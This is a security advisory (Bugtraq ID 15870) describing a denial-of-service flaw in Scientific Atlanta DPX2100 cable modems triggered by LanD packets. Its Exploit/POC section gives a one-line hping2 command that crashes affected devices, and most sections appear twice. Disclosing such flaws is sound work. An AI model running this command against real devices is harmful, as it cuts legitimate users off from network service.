Scientific Atlanta DPX2100 Cable Modem LanD Packet Denial Of Service Vulnerability
BID:15870
Info
Scientific Atlanta DPX2100 Cable Modem LanD Packet Denial Of Service Vulnerability
| Bugtraq ID: | 15870 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 14 2005 12:00AM |
| Updated: | Dec 14 2005 12:00AM |
| Credit: | Justin M. Wray <[email protected]> is credited with the discovery of this issue. |
| Vulnerable: |
Scientific Atlanta DPX2100 |
| Not Vulnerable: | |
Discussion
Scientific Atlanta DPX2100 Cable Modem LanD Packet Denial Of Service Vulnerability
Scientific Atlanta DPX2100 cable modems are prone to a denial of service vulnerability.
These devices are susceptible to a remote denial of service vulnerability when handling TCP 'LanD' packets.
This issue allows remote attackers to crash affected devices, or to temporarily block further network routing functionality. This will deny further network services to legitimate users.
Scientific Atlanta DPX2100 cable modems are reportedly affected by this issue. Due to code reuse among devices, other devices may also be affected.
Scientific Atlanta DPX2100 cable modems are prone to a denial of service vulnerability.
These devices are susceptible to a remote denial of service vulnerability when handling TCP 'LanD' packets.
This issue allows remote attackers to crash affected devices, or to temporarily block further network routing functionality. This will deny further network services to legitimate users.
Scientific Atlanta DPX2100 cable modems are reportedly affected by this issue. Due to code reuse among devices, other devices may also be affected.
Exploit / POC
Scientific Atlanta DPX2100 Cable Modem LanD Packet Denial Of Service Vulnerability
No exploit is required.
The following Hping2 command is sufficient to crash affected devices. The IP addresses must both be configured on the targeted device:
hping2 -A -S -P -U 1.2.3.4 -s 80 -p 80 -a 192.168.1.1
No exploit is required.
The following Hping2 command is sufficient to crash affected devices. The IP addresses must both be configured on the targeted device:
hping2 -A -S -P -U 1.2.3.4 -s 80 -p 80 -a 192.168.1.1
Solution / Fix
Scientific Atlanta DPX2100 Cable Modem LanD Packet Denial Of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Scientific Atlanta DPX2100 Cable Modem LanD Packet Denial Of Service Vulnerability
References:
References:
- Scientific Atlanta Cable Modem Product Page (Scientific Atlanta)
- RLA ("Remote LanD Attack") (Synister Syntax
)